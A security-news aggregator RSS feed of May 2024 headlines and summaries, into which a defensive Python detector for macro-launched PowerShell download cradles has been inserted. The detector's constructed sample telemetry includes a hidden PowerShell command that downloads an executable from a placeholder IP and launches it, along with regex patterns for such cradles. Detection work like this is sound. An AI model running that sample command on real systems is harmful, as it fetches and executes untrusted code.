www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It's a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2025-05-12T15:39:13+00:00 www.secnews.physaphae.fr

SecurityWeek - Security News
Social Distortion: The Threat of Fear, Uncertainty and Deception in Creating Security Risk
A look into the traditional pillars of security community culture and how they are being weakened and compromised, and even a peek at where this all could go in a world of deepfakes and AI-fueled bias and hallucination.
2024-05-28T13:32:24+00:00 https://www.securityweek.com/social-distortion-the-threat-of-fear-uncertainty-and-deception-in-creating-security-risk/ www.secnews.physaphae.fr/article.php?IdArticle=8508601 False Threat None 3.0000000000000000
Global Security Mag - French news site
Cyjax: Telltale signs that the Medusa Ransomware group are Russian affiliated
Opinion by Ian Thornton-Trump, CISO, Cyjax, and Roman Faithful, Cyber Threat Intelligence Team Lead, Cyjax.
2024-05-28T12:16:01+00:00 https://www.globalsecuritymag.fr/cyjax-telltale-signs-that-the-medusa-ransomware-group-are-russian-affiliated.html www.secnews.physaphae.fr/article.php?IdArticle=8508549 False Ransomware,Threat None 3.0000000000000000
Palo Alto Networks - Vendor site
AI Powers Sabre's Enhanced Threat Detection & Response
Precision AI by Palo Alto Networks helps security teams trust AI outcomes using security-specific models to automate detection, prevention and remediation.
2024-05-28T12:00:22+00:00 https://www.paloaltonetworks.com/blog/2024/05/precision-ai-powers-sabres-enhanced-threat-detection-response/ www.secnews.physaphae.fr/article.php?IdArticle=8508490 False Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites
Unknown threat actors are abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code into victim sites that is capable of harvesting credit card data. The campaign, observed by Sucuri on May 11, 2024, entails the abuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. It has over 200 active installations.
2024-05-28T12:00:00+00:00 https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html www.secnews.physaphae.fr/article.php?IdArticle=8508327 False Threat None 3.0000000000000000

AlienVault Lab Blog - AlienVault is a major defense actor in IOCs
The Evolution of Cyber Threats in the Age of AI: Challenges and Responses
2024-05-28T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/the-evolution-of-cyber-threats-in-the-age-of-ai-challenges-and-responses www.secnews.physaphae.fr/article.php?IdArticle=8508424 False Malware,Tool,Vulnerability,Threat,Prediction,Conference None 3.0000000000000000

SecurityWeek - Security News
Check Point VPNs Targeted to Hack Enterprise Networks
Check Point is warning customers that threat actors are targeting insecure VPN instances for initial access to enterprise networks.
2024-05-28T08:57:31+00:00 https://www.securityweek.com/check-point-vpn-targeted-for-initial-access-in-enterprise-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8508733 False Hack,Threat None 4.0000000000000000
IndustrialCyber - cyber risk firms for industrial
BlackBerry exposes cyber espionage by Transparent Tribe targeting Indian government, defense sectors
BlackBerry disclosed that the Pakistani-based advanced persistent threat group Transparent Tribe (APT36) targeted the Indian government, defense, and...
2024-05-27T17:59:53+00:00 https://industrialcyber.co/threats-attacks/blackberry-exposes-cyber-espionage-by-transparent-tribe-targeting-indian-government-defense-sectors/ www.secnews.physaphae.fr/article.php?IdArticle=8507970 False Threat APT 36 3.0000000000000000
Bleeping Computer - American magazine
Hackers target Check Point VPNs to breach enterprise networks
Threat actors are targeting Check Point Remote Access VPN devices in an ongoing campaign to breach enterprise networks, the company warned in a Monday advisory. [...]
2024-05-27T14:19:21+00:00 https://www.bleepingcomputer.com/news/security/hackers-target-check-point-vpns-to-breach-enterprise-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8508000 False Threat None 2.0000000000000000

Checkpoint Research - Security hardware manufacturer
27th May – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 20th May, please download our Threat_Intelligence Bulletin. TOP ATTACKS AND BREACHES A data breach has exposed 500GB of Indian biometric data, affecting Indian police, military personnel, and other public workers during elections in India. The leak stemmed from unsecured databases managed by ThoughtGreen Technologies […]
2024-05-27T12:23:17+00:00 https://research.checkpoint.com/2024/27th-may-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8507826 False Data Breach,Threat,Legislation None 2.0000000000000000
Kaspersky - Kaspersky Research blog
Threat landscape for industrial automation systems, Q1 2024
In this report Kaspersky ICS CERT shares statistics on threats blocked on ICS computers globally and in separate regions in Q1 2024: share of attacked computers, most affected industries, most common types of threats.
2024-05-27T10:00:04+00:00 https://securelist.com/industrial-threat-landscape-q1-2024/112683/ www.secnews.physaphae.fr/article.php?IdArticle=8507736 False Threat,Industrial None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
Experts Find Flaw in Replicate AI Service Exposing Customers' Models and Data
Cybersecurity researchers have discovered a critical security flaw in the artificial intelligence (AI)-as-a-service provider Replicate that could have allowed threat actors to gain access to proprietary AI models and sensitive information. "Exploitation of this vulnerability would have allowed unauthorized access to the AI prompts and results of all Replicate's platform customers,"
2024-05-25T14:41:00+00:00 https://thehackernews.com/2024/05/experts-find-flaw-in-replicate-ai.html www.secnews.physaphae.fr/article.php?IdArticle=8506643 False Vulnerability,Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
Hackers Created Rogue VMs to Evade Detection in Recent MITRE Cyber Attack
The MITRE Corporation has revealed that the cyber attack targeting the not-for-profit company towards late December 2023 by exploiting zero-day flaws in Ivanti Connect Secure (ICS) involved the actor creating rogue virtual machines (VMs) within its VMware environment. "The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access," MITRE
2024-05-24T22:00:00+00:00 https://thehackernews.com/2024/05/hackers-created-rogue-vms-to-evade.html www.secnews.physaphae.fr/article.php?IdArticle=8506215 False Vulnerability,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)
Exploring the Metamorfo Banking Trojan
#### Targeted Geolocations
- North America
- South America
## Snapshot
Forcepoint reports on the Metamorfo Banking Trojan, also known as Casbaneiro, a banking trojan that targets North and South America.
## Description
The malware spreads through malspam campaigns, enticing users to click on HTML attachments. Once clicked, a series of activities is initiated, all focused on gathering system metadata. The malware is distributed via email, and the attachment contains malicious code that leads to data compromise. PowerShell commands are used to drop files at various suspicious locations, shut down the system, and establish persistence in order to steal user data such as computer names, modify system and user settings, perform keylogging, and send the collected data to compromised systems. Forcepoint customers are protected against this threat at various stages of the attack.
## References
["Exploring the Metamorfo Banking Trojan"](https://www.forcepoint.com/blog/x-labs/exploring-metamorfo-banking-malware) Forcepoint (Accessed 2024-05-24)
2024-05-24T19:09:46+00:00 https://community.riskiq.com/article/72f52370 www.secnews.physaphae.fr/article.php?IdArticle=8506313 False Malware,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)
Chinese hackers hide on military and govt networks for 6 years
2024-05-24T18:42:00+00:00 https://community.riskiq.com/article/c95e7fd5 www.secnews.physaphae.fr/article.php?IdArticle=8506285 True Ransomware,Spam,Malware,Tool,Threat,Commercial None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
Fake Antivirus Websites Deliver Malware to Android and Windows Devices
Threat actors have been observed making use of fake websites masquerading as legitimate antivirus solutions from Avast, Bitdefender, and Malwarebytes to propagate malware capable of stealing sensitive information from Android and Windows devices. "Hosting malicious software through sites which look legitimate is predatory to general consumers, especially those who look to protect their devices
2024-05-24T18:20:00+00:00 https://thehackernews.com/2024/05/fake-antivirus-websites-deliver-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8506136 False Malware,Threat,Mobile None 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
How Do Hackers Blend In So Well? Learn Their Tricks in This Expert Webinar
Don't be fooled into thinking that cyber threats are only a problem for large organizations. The truth is that cybercriminals are increasingly targeting smaller businesses, and they're getting smarter every day. Join our FREE webinar "Navigating the SMB Threat Landscape: Key Insights from Huntress' Threat Report," in which Jamie Levy - Director of Adversary Tactics at Huntress, a renowned
2024-05-24T17:19:00+00:00 https://thehackernews.com/2024/05/how-do-hackers-blend-in-so-well-learn.html www.secnews.physaphae.fr/article.php?IdArticle=8506072 False Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)
Moonstone Sleet using malicious tank game to infect devices
2024-05-24T17:17:36+00:00 https://community.riskiq.com/article/a8c96e40 www.secnews.physaphae.fr/article.php?IdArticle=8508821 False Malware,Tool,Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
Google Detects 4th Chrome Zero-Day in May Actively Under Attack - Update ASAP
Google on Thursday rolled out fixes to address a high-severity security flaw in its Chrome browser that it said has been exploited in the wild. Assigned the CVE identifier CVE-2024-5274, the vulnerability relates to a type confusion bug in the V8 JavaScript and WebAssembly engine. It was reported by Clément Lecigne of Google's Threat Analysis Group and Brendon Tiszka of
2024-05-24T15:40:00+00:00 https://thehackernews.com/2024/05/google-detects-4th-chrome-zero-day-in.html www.secnews.physaphae.fr/article.php?IdArticle=8506074 False Vulnerability,Threat None 2.0000000000000000

Dark Reading - Informationweek Branch
Google Discovers Fourth Zero-Day in Less Than a Month
The tech company has rolled out fixes for a type confusion vulnerability that has already been exploited by malicious actors.
2024-05-24T15:31:07+00:00 https://www.darkreading.com/vulnerabilities-threats/google-discovers-fourth-zero-day-in-less-than-a-month www.secnews.physaphae.fr/article.php?IdArticle=8506193 False Vulnerability,Threat None 3.0000000000000000

Netskope - Netskope is an American software company providing an IT security platform
Understanding Netskope for Good
An important part of the Netskope vision centers around the responsibility we have for supporting our wider communities. This is apparent in the way that our technology helps the global security community protect against the ever-evolving threat landscape. But we believe it's also incredibly important that we go beyond technology, and harness the power […]
2024-05-24T15:05:50+00:00 https://www.netskope.com/blog/understanding-netskope-for-good www.secnews.physaphae.fr/article.php?IdArticle=8506163 False Threat None 2.0000000000000000
Dark Reading - Informationweek Branch
Future-Proof Your Cybersecurity AI Strategy
An effective, long-term XDR strategy will address the ongoing need for rapid analysis and continual vetting of the latest threat intelligence.
2024-05-24T12:31:01+00:00 https://www.darkreading.com/cybersecurity-operations/future-proof-your-cybersecurity-ai-strategy www.secnews.physaphae.fr/article.php?IdArticle=8506104 False Threat None 2.0000000000000000

SecurityWeek - Security News
In Other News: China's Undersea Spying, Hotel Spyware, Iran's Disruptive Attacks
Noteworthy stories that might have slipped under the radar: Chinese repair ships might be spying on undersea communications, spyware found at hotel check-ins, UK not ready for China threat.
2024-05-24T11:30:00+00:00 https://www.securityweek.com/in-other-news-chinas-undersea-spying-hotel-spyware-irans-disruptive-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8506066 False Threat None 3.0000000000000000

Schneier on Security - American cryptologist researcher
On the Zero-Day Market
New paper: "Zero Progress on Zero Days: How the Last Ten Years Created the Modern Spyware Market": Abstract: Spyware makes surveillance simple. The last ten years have seen a global market emerge for ready-made software that lets governments surveil their citizens and foreign adversaries alike and to do so more easily than when such work required tradecraft. The last ten years have also been marked by stark failures to control spyware and its precursors and components. This Article accounts for and critiques these failures, providing a socio-technical history since 2014, particularly focusing on the conversation about trade in zero-day vulnerabilities and exploits. Second, this Article applies lessons from these failures to guide regulatory efforts going forward. While recognizing that controlling this trade is difficult, I argue countries should focus on building and strengthening multilateral coalitions of the willing, rather than on strong-arming existing multilateral institutions into working on the problem. Individually, countries should focus on export controls and other sanctions that target specific bad actors, rather than focusing on restricting particular technologies. Last, I continue to call for transparency as a key part of oversight of domestic governments' use of spyware and related components...
2024-05-24T11:07:53+00:00 https://www.schneier.com/blog/archives/2024/05/on-the-zero-day-market.html www.secnews.physaphae.fr/article.php?IdArticle=8506065 False Vulnerability,Threat None 3.0000000000000000
RiskIQ - cyber risk firms (now microsoft)
Crimeware Report: Acrid, ScarletStealer, and Sys01 Stealers
2024-05-24T01:09:17+00:00 https://community.riskiq.com/article/8ca39741 www.secnews.physaphae.fr/article.php?IdArticle=8505826 False Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
Ransomware Attacks Exploit VMware ESXi Vulnerabilities in Alarming Pattern
Ransomware attacks targeting VMware ESXi infrastructure follow an established pattern regardless of the file-encrypting malware deployed. "Virtualization platforms are a core component of organizational IT infrastructure, yet they often suffer from inherent misconfigurations and vulnerabilities, making them a lucrative and highly effective target for threat actors to abuse,"
2024-05-23T22:33:00+00:00 https://thehackernews.com/2024/05/ransomware-attacks-exploit-vmware-esxi.html www.secnews.physaphae.fr/article.php?IdArticle=8505590 False Ransomware,Malware,Vulnerability,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)
GhostEngine mining attacks kill EDR security using vulnerable drivers
## Snapshot
Elastic Security Labs has identified an intrusion set, REF4578, that incorporates several malicious modules and leverages vulnerable drivers to disable known security solutions (EDRs) for crypto mining.
## Description
The primary payload of this intrusion set is GHOSTENGINE, which is responsible for retrieving and executing modules on the machine. GHOSTENGINE primarily uses HTTP to download files from a configured domain, with a backup IP in case the domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig. The malware authors incorporated many contingency and duplication mechanisms, and GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner. This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRig miner. The malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent and then deletes the security agent binary with another vulnerable
2024-05-23T21:02:25+00:00 https://community.riskiq.com/article/c2420a77 www.secnews.physaphae.fr/article.php?IdArticle=8505727 False Malware,Threat None 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
New Frontiers, Old Tactics: Chinese Espionage Group Targets Africa & Caribbean Govts
The China-linked threat actor known as Sharp Panda has expanded their targeting to include governmental organizations in Africa and the Caribbean as part of an ongoing cyber espionage campaign. "The campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools," Check Point
2024-05-23T19:20:00+00:00 https://thehackernews.com/2024/05/new-frontiers-old-tactics-chinese-cyber.html www.secnews.physaphae.fr/article.php?IdArticle=8505502 False Tool,Threat None 3.0000000000000000

TechRepublic - Security News US
IBM X-Force Report: Grandoreiro Malware Targets More Than 1,500 Banks in 60 Countries
Find out how Grandoreiro banking trojan campaigns work and the countries targeted, as well as how to mitigate this malware threat.
2024-05-23T18:34:07+00:00 https://www.techrepublic.com/article/ibm-xforce-grandoreiro-banking-trojan-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8505618 False Malware,Threat None 2.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, no?)
Inside Operation Diplomatic Specter: Chinese APT Group's Stealthy Tactics Exposed
Governmental entities in the Middle East, Africa, and Asia are the target of a Chinese advanced persistent threat (APT) group as part of an ongoing cyber espionage campaign dubbed Operation Diplomatic Specter since at least late 2022. "An analysis of this threat actor's activity reveals long-term espionage operations against at least seven governmental entities," Palo Alto Networks
2024-05-23T16:44:00+00:00 https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html www.secnews.physaphae.fr/article.php?IdArticle=8505403 False Threat None 3.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine
Cybercriminals Exploit Cloud Storage For SMS Phishing Scams
According to Enea, these campaigns use cloud storage platforms to host malicious websites, sending links via SMS to bypass firewalls
2024-05-23T16:15:00+00:00 https://www.infosecurity-magazine.com/news/cloud-storage-exploited-sms/ www.secnews.physaphae.fr/article.php?IdArticle=8505564 False Threat,Cloud None 2.0000000000000000

Checkpoint Research - Security hardware manufacturer
Sharp Dragon Expands Towards Africa and The Caribbean
Key Findings Introduction Since 2021, Check Point Research has been closely monitoring the activities of Sharp Dragon (formerly referred to as Sharp Panda*), a Chinese threat actor. Historical activities mostly consist of highly targeted phishing emails, previously leading to the deployment of the VictoryDLL or Soul framework. While the final payloads Sharp Dragon operators have deployed over time changed, their modus operandi […]
2024-05-23T13:07:07+00:00 https://research.checkpoint.com/2024/sharp-dragon-expands-towards-africa-and-the-caribbean/ www.secnews.physaphae.fr/article.php?IdArticle=8505435 False Threat None 2.0000000000000000
Checkpoint - Security hardware manufacturer
Chinese Espionage Campaign Expands to Target Africa and The Caribbean
Check Point Research (CPR) sees an ongoing cyber espionage campaign that focuses on targeting governmental organizations in Africa and the Caribbean. Attributed to the Chinese threat actor Sharp Dragon (formerly Sharp Panda), the campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools. This refined approach suggests a deeper understanding of their targets. Key Findings Sharp Dragon's (formerly referred to as Sharp Panda) operations continue, now expanding their focus to new regions – Africa and the Caribbean. Sharp Dragon utilizes trusted government entities to infect new […]
2024-05-23T13:00:02+00:00 https://blog.checkpoint.com/research/chinese-espionage-campaign-expands-to-target-africa-and-the-caribbean/ www.secnews.physaphae.fr/article.php?IdArticle=8505461 False Tool,Threat None 2.0000000000000000
Netskope - Netskope is an American software company providing an IT security platform
Phishing with Cloudflare Workers: Transparent Phishing and HTML Smuggling
Summary Netskope Threat Labs is tracking multiple phishing campaigns that abuse Cloudflare Workers. The campaigns are likely the work of different attackers since they use two very different techniques. One campaign (similar to the previously disclosed Azorult campaign) uses HTML smuggling, a detection evasion technique often used for downloading malware, to hide the phishing content […]
2024-05-23T13:00:00+00:00 https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling www.secnews.physaphae.fr/article.php?IdArticle=8505431 False Malware,Threat None 3.0000000000000000
DarkTrace - DarkTrace: AI-based detection
How to Protect your Organization Against Microsoft Teams Phishing Attacks
In recent months, we've seen a dramatic rise in the number of attacks using Microsoft Teams as a threat vector. This blog will explore why Teams is becoming such a popular entry point, how built-in and market security offerings fail to address sophisticated Teams threats, and why behavioral AI is the solution to early detection of Teams-based social engineering and account compromise.
2024-05-23T11:36:00+00:00 https://darktrace.com/blog/how-to-protect-your-organization-against-microsoft-teams-phishing-attacks www.secnews.physaphae.fr/article.php?IdArticle=8505394 False Threat None 3.0000000000000000

SecurityWeek - Security News
Zero-Day Attacks and Supply Chain Compromises Surge, MFA Remains Underutilized: Rapid7 Report
Attackers are getting more sophisticated, better armed, and faster. Nothing in Rapid7's 2024 Attack Intelligence Report suggests that this will change.
2024-05-23T11:00:00+00:00 https://www.securityweek.com/zero-day-attacks-and-supply-chain-compromises-surge-mfa-remains-underutilized-rapid7-report/ www.secnews.physaphae.fr/article.php?IdArticle=8505399 False Vulnerability,Threat None 2.0000000000000000
The Register - English-language news site. UK data watchdog wants six figures from N Ireland cops after 2023 data leak. Massive discount applied to save cop shop's helicopter budget. Following a data leak that brought "tangible fear of threat to life", the UK's data protection watchdog says it intends to fine the Police Service of Northern Ireland (PSNI) £750,000 ($955,798).…
2024-05-23T08:30:13+00:00 https://go.theregister.com/feed/www.theregister.com/2024/05/23/uks_ico_wants_six_figures/ www.secnews.physaphae.fr/article.php?IdArticle=8505306 False Threat,Legislation None 3.0000000000000000
ProofPoint - Cyber Firms. Proofpoint vs. Abnormal Security: A Fortune 500 Company Explains Why One Is Better
2024-05-23T08:02:17+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/proofpoint-vs-abnormal-security-fortune-500-company-explains-why-one www.secnews.physaphae.fr/article.php?IdArticle=8505429 False Ransomware,Malware,Tool,Threat None 3.0000000000000000
CyberScoop - scoopnewsgroup.com special Cyber. Current, former government cyber officials tout industry collaboration advancements. Easterly, Krebs and others discuss Ivanti breach, expiring legal protections for companies that share threat data with feds, and JCDC progress.
2024-05-23T01:07:40+00:00 https://cyberscoop.com/current-former-government-cyber-officials-tout-industry-collaboration-advancements/ www.secnews.physaphae.fr/article.php?IdArticle=8505126 False Threat None 2.0000000000000000
Cyber Futures - Podcast Cyber. Moonshot Launches New Guide to Spotting Manipulation Ahead of European Elections. Moonshot, a global leader in fighting online dangers, has just launched an online guide to help people spot fake news before the European Elections. You can find this guide on the EU Prebunking site. It has videos and resources to teach you how to recognize and deal with false information and manipulation. Moonshot, an international company with offices in Dublin, was co-founded by Ross Frenett from Cobh, Cork. His presentation at TechFest 2022 in Cork was memorable, showing Moonshot's dedication to making the internet safer. Aoife Long, the Cyber Skills Education and Public Engagement Manager, attended the event and said, “I found his talk fascinating, especially how technology can be combined with his understanding of counter-terrorism to protect citizens.” You can learn more about Moonshot and their projects on their website. The ENISA Threat Landscape 2023 report has identified information manipulation as a major threat. ENISA, the European Union Agency for Cybersecurity, regularly publishes these reports to inform industry professionals about current threats and emphasize the need for vigilance and proactive measures against cyber threats. For more information and to access the guide, visit the EU Prebunking site. Stay informed and help protect the upcoming European Elections.
2024-05-23T00:00:00+00:00 https://www.cyberfutures.ie/news/moonshot-launches-new-guide-to-spotting-manipulation-ahead-of-european-elections.html www.secnews.physaphae.fr/article.php?IdArticle=8517371 False Threat None 3.0000000000000000
RiskIQ - cyber risk firms (now Microsoft). UAC-0006 Increased Cyberattacks
## Snapshot
The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) has observed increased activity from a financially motivated threat actor it tracks as UAC-0006. Since May 20, 2024, the group has conducted at least two distinct malware distribution campaigns.
## Description
CERT-UA reports that these campaigns distribute SmokeLoader malware via phishing emails. The emails carry ZIP archives containing malicious files: .IMG disk images holding executable (.exe) files, and Microsoft Access (.ACCDB) databases with embedded macros. The macros run PowerShell commands that download and execute the payloads. After initial compromise, additional malware such as Taleshot and RMS is downloaded and installed. The botnet currently comprises several hundred infected computers. Given this increased activity, CERT-UA expects a rise in fraud schemes targeting remote banking systems in the near future.
## Detections
**Microsoft Defender Antivirus**
Microsoft Defender Antivirus detects threat components as the following malware:
- [Trojan:Win32/SmokeLoader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/SmokeLoader&threatId=-2147238753)
- [Trojan:Win64/Smokeloader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Smokeloader&threatId=-2147113809)
## References
[UAC-0006 Increased Cyberattacks](https://cert.gov.ua/article/6279366). Computer Emergency Response Team of Ukraine (accessed 2024-05-22)
2024-05-22T20:16:56+00:00 https://community.riskiq.com/article/7bef5f52 www.secnews.physaphae.fr/article.php?IdArticle=8505023 False Malware,Threat None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?). Researchers Warn of Chinese-Aligned Hackers Targeting South China Sea Countries. Cybersecurity researchers have disclosed details of a previously undocumented threat group called Unfading Sea Haze that's believed to have been active since 2018. The intrusion singled out high-level organizations in South China Sea countries, particularly military and government targets, Bitdefender said in a report shared with The Hacker News. "The investigation revealed a troubling
2024-05-22T19:45:00+00:00 https://thehackernews.com/2024/05/researchers-warn-of-chinese-aligned.html www.secnews.physaphae.fr/article.php?IdArticle=8504840 False Threat None 3.0000000000000000
CyberScoop - scoopnewsgroup.com special Cyber. Chinese hacking threat puts focus on protecting critical infrastructure, Biden adviser says. National Cyber Director Harry Coker said he doubts the U.S. public realizes the full scope of the cybersecurity threat facing the United States.
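The UAC-0006 chain in the RiskIQ entry above (Access database macro, then a PowerShell download, then an executable) shows up in endpoint telemetry as an Office process spawning a shell with a download cradle on its command line. The following Python is an added example, not CERT-UA's or Microsoft's detection logic: it scores constructed, tab-separated process-creation records (parent image, child image, command line; the field layout is an assumption for the example, and the IP and paths in the sample are constructed). It generalises beyond the Access case to the other Office hosts and script interpreters a macro dropper typically abuses.

```python
"""Score process-creation telemetry for Office-spawned PowerShell download cradles.

Added example, not CERT-UA's or Microsoft's detection content. Each input record is a
constructed, tab-separated line: parent image path, child image path, command line.
Sysmon Event ID 1 or an EDR export carries the same fields under other names.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"msaccess.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download cradles and launch options commonly seen in macro-started PowerShell.
CRADLE_RE = re.compile(
    r"(?i)(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|Net\.WebClient|Invoke-RestMethod)"
)
ENCODED_RE = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
EXEC_RE = re.compile(r"(?i)(Start-Process|\biex\b|Invoke-Expression)")


@dataclass(frozen=True)
class Verdict:
    line: int
    severity: str               # "high", "medium" or "low"
    reasons: tuple[str, ...]


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def classify(parent: str, child: str, cmdline: str) -> tuple[str, tuple[str, ...]]:
    """Return (severity, reasons) for one process start."""
    reasons = []
    office_spawned_shell = basename(parent) in OFFICE_PARENTS and basename(child) in SHELL_CHILDREN
    if office_spawned_shell:
        reasons.append("office-app-spawned-shell")
    if CRADLE_RE.search(cmdline):
        reasons.append("download-cradle")
    if ENCODED_RE.search(cmdline):
        reasons.append("encoded-command")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden-window")
    if EXEC_RE.search(cmdline):
        reasons.append("launches-payload")
    # Office parent plus a network fetch is the macro-dropper pattern; either alone also
    # occurs in legitimate admin activity, so it only earns a medium score.
    cradle = "download-cradle" in reasons
    if office_spawned_shell and cradle:
        severity = "high"
    elif office_spawned_shell or cradle:
        severity = "medium"
    else:
        severity = "low"
    return severity, tuple(reasons)


def scan(records: str) -> list[Verdict]:
    """Parse tab-separated records and return one Verdict per well-formed line."""
    verdicts = []
    for n, raw in enumerate(records.splitlines(), start=1):
        parts = raw.split("\t", 2)
        if len(parts) != 3:
            continue  # blank or malformed record
        severity, reasons = classify(*parts)
        verdicts.append(Verdict(n, severity, reasons))
    return verdicts


# Constructed sample telemetry; 198.51.100.7 is an RFC 5737 documentation address.
SAMPLE_RECORDS = "\n".join([
    "\t".join([
        r"C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile("
        r"'http://198.51.100.7/upd.exe','C:\Users\Public\upd.exe'); Start-Process C:\Users\Public\upd.exe",
    ]),
    "\t".join([
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\alice\Documents",
    ]),
    "\t".join([
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c whoami",
    ]),
])


def high_severity(records: str = SAMPLE_RECORDS) -> list[Verdict]:
    """Convenience filter: only the records worth paging someone for."""
    return [v for v in scan(records) if v.severity == "high"]


if __name__ == "__main__":
    for v in scan(SAMPLE_RECORDS):
        print(f"line {v.line}: {v.severity:<6} {', '.join(v.reasons) or '-'}")
```

The explorer-launched PowerShell scores low and the Word-launched cmd.exe only medium: the point of the two-signal rule is that an Office parent by itself fires constantly in real estates, while the parent plus a cradle is rare enough to act on.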
2024-05-22T18:54:48+00:00 https://cyberscoop.com/harry-coker-china-critical-infrastructure-cyber/ www.secnews.physaphae.fr/article.php?IdArticle=8504934 False Threat None 3.0000000000000000
RiskIQ - cyber risk firms (now Microsoft). Grandoreiro Banking Trojan Resurfaces in Global Campaign
2024-05-22T16:31:26+00:00 https://community.riskiq.com/article/bc072613 www.secnews.physaphae.fr/article.php?IdArticle=8504898 False Spam,Malware,Tool,Threat,Legislation None 2.0000000000000000
RiskIQ - cyber risk firms (now Microsoft). Bad Karma, No Justice: Void Manticore Destructive Activities in Israel
2024-05-22T15:21:21+00:00 https://community.riskiq.com/article/d5d5c07f www.secnews.physaphae.fr/article.php?IdArticle=8504864 False Ransomware,Malware,Tool,Threat APT 34 3.0000000000000000
Global Security Mag - French news site. Tigera Extends Calico Commercial Editions' Capabilities to Simplify Security Operations for Runtime Threat Detection for Cloud-Native Applications. Latest enhancements streamline the deployment and implementation of runtime security and observability for Kubernetes - Product Reviews
2024-05-22T14:45:00+00:00 https://www.globalsecuritymag.fr/tigera-extends-calico-commercial-editions-capabilities.html www.secnews.physaphae.fr/article.php?IdArticle=8504809 False Threat,Commercial None 2.0000000000000000
The Last Watchdog - Byron V. Acohido's security blog. News alert: AI SPERA integrates its 'Criminal IP' threat intelligence tool into AWS Marketplace. Torrance, Calif., May 22, 2024, CyberNewsWire: AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, announced today that its proprietary search engine, Criminal IP, is now available on the AWS Marketplace. This integration ensures efficient software procurement … (more…) The post News alert: AI SPERA integrates its 'Criminal IP' threat intelligence tool into AWS Marketplace first appeared on The Last Watchdog.
2024-05-22T14:20:38+00:00 https://www.lastwatchdog.com/news-alert-ai-spera-integrates-its-criminal-ip-threat-intelligence-tool-into-aws-marketplace/ www.secnews.physaphae.fr/article.php?IdArticle=8504799 False Tool,Threat None 3.0000000000000000
HackRead - Cyber research. Criminal IP: Enhancing Security Solutions through AWS Marketplace Integration. By Cyber Newswire. AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, announced today that its proprietary search engine, Criminal… This is a post from HackRead.com. Read the original post: Criminal IP: Enhancing Security Solutions through AWS Marketplace Integration
